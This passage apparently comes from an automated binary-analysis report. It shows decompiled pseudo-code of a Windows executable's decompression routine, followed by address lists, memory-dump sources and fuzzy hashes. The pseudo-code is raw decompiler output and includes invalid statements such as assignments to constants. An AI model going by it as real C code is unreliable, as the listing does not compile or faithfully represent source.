              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              												__eax =  *(__ebp - 0x58);
              												__esi = __edx + __eax;
              												 *(__ebp - 0x54) = __esi;
              												__ax =  *__esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													__cx = __ax >> 5;
              													__eax = __eax - __ecx;
              													__edx = __edx + 1;
              													__eflags = __edx;
              													 *__esi = __ax;
              													 *(__ebp - 0x50) = __edx;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L148;
              												} else {
              													goto L146;
              												}
              											case 0x19:
              												__eflags = __ebx - 4;
              												if(__ebx < 4) {
              													 *(__ebp - 0x2c) = __ebx;
              													L119:
              													_t393 = __ebp - 0x2c;
              													 *_t393 =  *(__ebp - 0x2c) + 1;
              													__eflags =  *_t393;
              													L120:
              													__eax =  *(__ebp - 0x2c);
              													__eflags = __eax;
              													if(__eax == 0) {
              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              														goto L170;
              													}
              													__eflags = __eax -  *(__ebp - 0x60);
              													if(__eax >  *(__ebp - 0x60)) {
              														goto L171;
              													}
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              													__eax =  *(__ebp - 0x30);
              													_t400 = __ebp - 0x60;
              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              													__eflags =  *_t400;
              													goto L123;
              												}
              												__ecx = __ebx;
              												__eax = __ebx;
              												__ecx = __ebx >> 1;
              												__eax = __ebx & 0x00000001;
              												__ecx = (__ebx >> 1) - 1;
              												__al = __al | 0x00000002;
              												__eax = (__ebx & 0x00000001) << __cl;
              												__eflags = __ebx - 0xe;
              												 *(__ebp - 0x2c) = __eax;
              												if(__ebx >= 0xe) {
              													__ebx = 0;
              													 *(__ebp - 0x48) = __ecx;
              													L102:
              													__eflags =  *(__ebp - 0x48);
              													if( *(__ebp - 0x48) <= 0) {
              														__eax = __eax + __ebx;
              														 *(__ebp - 0x40) = 4;
              														 *(__ebp - 0x2c) = __eax;
              														__eax =  *(__ebp - 4);
              														__eax =  *(__ebp - 4) + 0x644;
              														__eflags = __eax;
              														L108:
              														__ebx = 0;
              														 *(__ebp - 0x58) = __eax;
              														 *(__ebp - 0x50) = 1;
              														 *(__ebp - 0x44) = 0;
              														 *(__ebp - 0x48) = 0;
              														L112:
              														__eax =  *(__ebp - 0x40);
              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              															_t391 = __ebp - 0x2c;
              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
              															__eflags =  *_t391;
              															goto L119;
              														}
              														__eax =  *(__ebp - 0x50);
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              														__eax =  *(__ebp - 0x58);
              														__esi = __edi + __eax;
              														 *(__ebp - 0x54) = __esi;
              														__ax =  *__esi;
              														__ecx = __ax & 0x0000ffff;
              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              														__eflags =  *(__ebp - 0xc) - __edx;
              														if( *(__ebp - 0xc) >= __edx) {
              															__ecx = 0;
              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              															__ecx = 1;
              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              															__ebx = 1;
              															__ecx =  *(__ebp - 0x48);
              															__ebx = 1 << __cl;
              															__ecx = 1 << __cl;
              															__ebx =  *(__ebp - 0x44);
              															__ebx =  *(__ebp - 0x44) | __ecx;
              															__cx = __ax;
              															__cx = __ax >> 5;
              															__eax = __eax - __ecx;
              															__edi = __edi + 1;
              															__eflags = __edi;
              															 *(__ebp - 0x44) = __ebx;
              															 *__esi = __ax;
              															 *(__ebp - 0x50) = __edi;
              														} else {
              															 *(__ebp - 0x10) = __edx;
              															0x800 = 0x800 - __ecx;
              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              															 *__esi = __dx;
              														}
              														__eflags =  *(__ebp - 0x10) - 0x1000000;
              														if( *(__ebp - 0x10) >= 0x1000000) {
              															L111:
              															_t368 = __ebp - 0x48;
              															 *_t368 =  *(__ebp - 0x48) + 1;
              															__eflags =  *_t368;
              															goto L112;
              														} else {
              															goto L109;
              														}
              													}
              													__ecx =  *(__ebp - 0xc);
              													__ebx = __ebx + __ebx;
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              														__ecx =  *(__ebp - 0x10);
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              														__ebx = __ebx | 0x00000001;
              														__eflags = __ebx;
              														 *(__ebp - 0x44) = __ebx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L101:
              														_t338 = __ebp - 0x48;
              														 *_t338 =  *(__ebp - 0x48) - 1;
              														__eflags =  *_t338;
              														goto L102;
              													} else {
              														goto L99;
              													}
              												}
              												__edx =  *(__ebp - 4);
              												__eax = __eax - __ebx;
              												 *(__ebp - 0x40) = __ecx;
              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              												goto L108;
              											case 0x1a:
              												L56:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1a;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x68);
              												__al =  *(__ebp - 0x5c);
              												__edx =  *(__ebp - 8);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *( *(__ebp - 0x68)) = __al;
              												__ecx =  *(__ebp - 0x14);
              												 *(__ecx +  *(__ebp - 8)) = __al;
              												__eax = __ecx + 1;
              												__edx = 0;
              												_t192 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t192;
              												goto L79;
              											case 0x1b:
              												L75:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1b;
              													goto L170;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t274 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t274;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												_t283 = __ebp - 0x64;
              												 *_t283 =  *(__ebp - 0x64) - 1;
              												__eflags =  *_t283;
              												 *( *(__ebp - 0x68)) = __cl;
              												L79:
              												 *(__ebp - 0x14) = __edx;
              												goto L80;
              											case 0x1c:
              												while(1) {
              													L123:
              													__eflags =  *(__ebp - 0x64);
              													if( *(__ebp - 0x64) == 0) {
              														break;
              													}
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__edx =  *(__ebp - 8);
              													__cl =  *(__eax + __edx);
              													__eax =  *(__ebp - 0x14);
              													 *(__ebp - 0x5c) = __cl;
              													 *(__eax + __edx) = __cl;
              													__eax = __eax + 1;
              													__edx = 0;
              													_t414 = __eax %  *(__ebp - 0x74);
              													__eax = __eax /  *(__ebp - 0x74);
              													__edx = _t414;
              													__eax =  *(__ebp - 0x68);
              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              													__eflags =  *(__ebp - 0x30);
              													 *( *(__ebp - 0x68)) = __cl;
              													 *(__ebp - 0x14) = _t414;
              													if( *(__ebp - 0x30) > 0) {
              														continue;
              													} else {
              														L80:
              														 *(__ebp - 0x88) = 2;
              														goto L1;
              													}
              												}
              												 *(__ebp - 0x88) = 0x1c;
              												goto L170;
              										}
              									}
              									L171:
              									_t544 = _t543 | 0xffffffff;
              									goto L172;
              								}
              							}
              						}
              					}
              					goto L1;
              				}
              			}














              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x00406efe

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
              • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00407018() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						 *(_t613 - 0x84) = 0xb;
              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
              						goto L132;
              					} else {
              						__eax =  *(__ebp - 0x28);
              						L88:
              						 *(__ebp - 0x2c) = __eax;
              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              						L89:
              						__eax =  *(__ebp - 4);
              						 *(__ebp - 0x80) = 0x15;
              						__eax =  *(__ebp - 4) + 0xa68;
              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              						L69:
              						 *(__ebp - 0x84) = 0x12;
              						while(1) {
              							L132:
              							 *(_t613 - 0x54) = _t606;
              							while(1) {
              								L133:
              								_t531 =  *_t606;
              								_t589 = _t531 & 0x0000ffff;
              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              								if( *(_t613 - 0xc) >= _t565) {
              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              									 *(_t613 - 0x40) = 1;
              									_t532 = _t531 - (_t531 >> 5);
              									 *_t606 = _t532;
              								} else {
              									 *(_t613 - 0x10) = _t565;
              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
              								}
              								if( *(_t613 - 0x10) >= 0x1000000) {
              									goto L139;
              								}
              								L137:
              								if( *(_t613 - 0x6c) == 0) {
              									 *(_t613 - 0x88) = 5;
              									L170:
              									_t568 = 0x22;
              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              									_t535 = 0;
              									L172:
              									return _t535;
              								}
              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              								L139:
              								_t533 =  *(_t613 - 0x84);
              								while(1) {
              									 *(_t613 - 0x88) = _t533;
              									while(1) {
              										L1:
              										_t534 =  *(_t613 - 0x88);
              										if(_t534 > 0x1c) {
              											break;
              										}
              										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              											case 0:
              												if( *(_t613 - 0x6c) == 0) {
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              												_t534 =  *( *(_t613 - 0x70));
              												if(_t534 > 0xe1) {
              													goto L171;
              												}
              												_t538 = _t534 & 0x000000ff;
              												_push(0x2d);
              												asm("cdq");
              												_pop(_t570);
              												_push(9);
              												_pop(_t571);
              												_t609 = _t538 / _t570;
              												_t540 = _t538 % _t570 & 0x000000ff;
              												asm("cdq");
              												_t604 = _t540 % _t571 & 0x000000ff;
              												 *(_t613 - 0x3c) = _t604;
              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
              												_t612 = (0x300 << _t604 + _t609) + 0x736;
              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              													L10:
              													if(_t612 == 0) {
              														L12:
              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              														goto L15;
              													} else {
              														goto L11;
              													}
              													do {
              														L11:
              														_t612 = _t612 - 1;
              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              													} while (_t612 != 0);
              													goto L12;
              												}
              												if( *(_t613 - 4) != 0) {
              													GlobalFree( *(_t613 - 4));
              												}
              												_t534 = GlobalAlloc(0x40, 0x600); // executed
              												 *(_t613 - 4) = _t534;
              												if(_t534 == 0) {
              													goto L171;
              												} else {
              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              													goto L10;
              												}
              											case 1:
              												L13:
              												__eflags =  *(_t613 - 0x6c);
              												if( *(_t613 - 0x6c) == 0) {
              													 *(_t613 - 0x88) = 1;
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              												_t45 = _t613 - 0x48;
              												 *_t45 =  *(_t613 - 0x48) + 1;
              												__eflags =  *_t45;
              												L15:
              												if( *(_t613 - 0x48) < 4) {
              													goto L13;
              												}
              												_t546 =  *(_t613 - 0x40);
              												if(_t546 ==  *(_t613 - 0x74)) {
              													L20:
              													 *(_t613 - 0x48) = 5;
              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              													goto L23;
              												}
              												 *(_t613 - 0x74) = _t546;
              												if( *(_t613 - 8) != 0) {
              													GlobalFree( *(_t613 - 8));
              												}
              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              												 *(_t613 - 8) = _t534;
              												if(_t534 == 0) {
              													goto L171;
              												} else {
              													goto L20;
              												}
              											case 2:
              												L24:
              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              												 *(_t613 - 0x84) = 6;
              												 *(_t613 - 0x4c) = _t553;
              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
              												L132:
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											case 3:
              												L21:
              												__eflags =  *(_t613 - 0x6c);
              												if( *(_t613 - 0x6c) == 0) {
              													 *(_t613 - 0x88) = 3;
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												_t67 = _t613 - 0x70;
              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
              												__eflags =  *_t67;
              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              												L23:
              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              												if( *(_t613 - 0x48) != 0) {
              													goto L21;
              												}
              												goto L24;
              											case 4:
              												L133:
              												_t531 =  *_t606;
              												_t589 = _t531 & 0x0000ffff;
              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              												if( *(_t613 - 0xc) >= _t565) {
              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              													 *(_t613 - 0x40) = 1;
              													_t532 = _t531 - (_t531 >> 5);
              													 *_t606 = _t532;
              												} else {
              													 *(_t613 - 0x10) = _t565;
              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
              												}
              												if( *(_t613 - 0x10) >= 0x1000000) {
              													goto L139;
              												}
              											case 5:
              												goto L137;
              											case 6:
              												__edx = 0;
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x34) = 1;
              													 *(__ebp - 0x84) = 7;
              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              													while(1) {
              														L132:
              														 *(_t613 - 0x54) = _t606;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
              												__esi =  *(__ebp - 0x60);
              												__cl = 8;
              												__cl = 8 -  *(__ebp - 0x3c);
              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              												__ecx =  *(__ebp - 0x3c);
              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              												__ecx =  *(__ebp - 4);
              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              												__eflags =  *(__ebp - 0x38) - 4;
              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												if( *(__ebp - 0x38) >= 4) {
              													__eflags =  *(__ebp - 0x38) - 0xa;
              													if( *(__ebp - 0x38) >= 0xa) {
              														_t98 = __ebp - 0x38;
              														 *_t98 =  *(__ebp - 0x38) - 6;
              														__eflags =  *_t98;
              													} else {
              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              													}
              												} else {
              													 *(__ebp - 0x38) = 0;
              												}
              												__eflags =  *(__ebp - 0x34) - __edx;
              												if( *(__ebp - 0x34) == __edx) {
              													__ebx = 0;
              													__ebx = 1;
              													goto L61;
              												} else {
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__ecx =  *(__ebp - 8);
              													__ebx = 0;
              													__ebx = 1;
              													__al =  *((intOrPtr*)(__eax + __ecx));
              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              													goto L41;
              												}
              											case 7:
              												__eflags =  *(__ebp - 0x40) - 1;
              												if( *(__ebp - 0x40) != 1) {
              													__eax =  *(__ebp - 0x24);
              													 *(__ebp - 0x80) = 0x16;
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x28);
              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
              													__eax =  *(__ebp - 0x2c);
              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              													__eax = 0;
              													__eflags =  *(__ebp - 0x38) - 7;
              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              													__al = __al & 0x000000fd;
              													__eax = (__eflags >= 0) - 1 + 0xa;
              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x664;
              													__eflags = __eax;
              													 *(__ebp - 0x58) = __eax;
              													goto L69;
              												}
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 8;
              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													L132:
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											case 8:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xa;
              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              												} else {
              													__eax =  *(__ebp - 0x38);
              													__ecx =  *(__ebp - 4);
              													__eax =  *(__ebp - 0x38) + 0xf;
              													 *(__ebp - 0x84) = 9;
              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              												}
              												while(1) {
              													L132:
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											case 9:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													goto L89;
              												}
              												__eflags =  *(__ebp - 0x60);
              												if( *(__ebp - 0x60) == 0) {
              													goto L171;
              												}
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
              												__eflags = _t259;
              												0 | _t259 = _t259 + _t259 + 9;
              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
              												goto L76;
              											case 0xa:
              												goto L0;
              											case 0xb:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__ecx =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x20);
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												} else {
              													__eax =  *(__ebp - 0x24);
              												}
              												__ecx =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												goto L88;
              											case 0xc:
              												L99:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xc;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t334 = __ebp - 0x70;
              												 *_t334 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t334;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												__eax =  *(__ebp - 0x2c);
              												goto L101;
              											case 0xd:
              												L37:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xd;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t122 = __ebp - 0x70;
              												 *_t122 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t122;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L39:
              												__eax =  *(__ebp - 0x40);
              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              													goto L48;
              												}
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													goto L54;
              												}
              												L41:
              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              												__ecx =  *(__ebp - 0x58);
              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              												 *(__ebp - 0x48) = __eax;
              												__eax = __eax + 1;
              												__eax = __eax << 8;
              												__eax = __eax + __ebx;
              												__esi =  *(__ebp - 0x58) + __eax * 2;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edx = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													 *(__ebp - 0x40) = 1;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													__ebx = __ebx + __ebx + 1;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              													 *(__ebp - 0x10) = __ecx;
